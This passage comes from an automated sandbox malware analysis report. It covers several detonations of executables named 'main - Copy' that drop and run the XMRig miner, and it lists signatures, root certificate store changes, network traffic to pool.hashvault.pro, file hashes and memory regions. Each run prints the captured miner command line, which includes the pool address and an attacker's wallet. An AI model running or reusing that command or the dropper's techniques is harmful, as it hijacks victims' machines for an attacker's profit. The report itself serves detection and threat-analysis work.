| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3148 wrote to memory of 932 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3148 wrote to memory of 932 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.201.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3984 wrote to memory of 3180 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3984 wrote to memory of 3180 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary value omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary value omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 856 wrote to memory of 2084 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 856 wrote to memory of 2084 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.167.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2084-73-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-74-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-75-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-76-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-77-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-78-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-79-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-80-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-81-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-82-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-83-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-84-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240426-en
Max time kernel
1795s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [binary data elided] | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [binary data elided] | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3712 wrote to memory of 4948 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3712 wrote to memory of 4948 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.253.116.51.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4948-16-0x000001A76CB50000-0x000001A76CB70000-memory.dmp
memory/4948-17-0x000001A76CBA0000-0x000001A76CBC0000-memory.dmp
memory/4948-18-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-20-0x000001A76CBE0000-0x000001A76CC00000-memory.dmp
memory/4948-19-0x000001A76CBC0000-0x000001A76CBE0000-memory.dmp
memory/4948-21-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-22-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-25-0x000001A76CBE0000-0x000001A76CC00000-memory.dmp
memory/4948-24-0x000001A76CBC0000-0x000001A76CBE0000-memory.dmp
memory/4948-23-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-26-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-27-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-28-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-29-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-30-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-31-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-32-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-33-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-34-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-35-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-36-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-37-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-38-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-39-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-40-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-41-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-42-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-43-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-44-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-45-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-46-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-47-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-48-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-49-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-50-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-51-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-52-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-53-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-54-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-55-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-56-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-57-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-58-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-59-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-60-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-61-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-62-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-63-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-64-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-65-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-66-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-67-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-68-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-69-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-70-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-71-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-72-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-73-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-74-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-75-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-76-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-77-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-78-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-79-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-80-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-81-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-82-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-83-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-84-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240426-en
Max time kernel
1798s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 780 wrote to memory of 4928 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 780 wrote to memory of 4928 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.197.79.40.in-addr.arpa | udp |
